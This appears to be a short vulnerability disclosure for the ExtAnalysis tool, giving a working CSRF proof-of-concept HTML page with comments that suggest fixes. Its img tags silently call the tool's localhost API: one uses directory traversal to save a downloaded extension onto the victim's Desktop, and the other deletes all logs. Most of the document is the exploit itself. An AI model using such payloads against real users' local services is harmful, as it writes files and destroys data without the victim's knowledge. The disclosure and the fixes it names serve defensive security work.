The ExtAnalysis
project is vulnerable against various CSRFs, that could lead to loss of functionalities and placement of malicious files in arbitrary directories without knowledge of the victim.
python2 extanalysis.py
command<html>
<!-- Downloads the Gmass extension in the `Desktop` folder. Fix: avoid `../` CSRF token -->
<img
src="http://127.0.0.1:13337/api/?query=dlanalysis&extid=ehomdgjhgmbidokdgicgmdiedadncbgf&savedir=../../../Desktop/hacked"
/>
<!-- Deletes all the log without knowledge of the victim. Fix: add CSRF token -->
<img src="http://127.0.0.1:13337/api/?query=deleteAll" />
</html>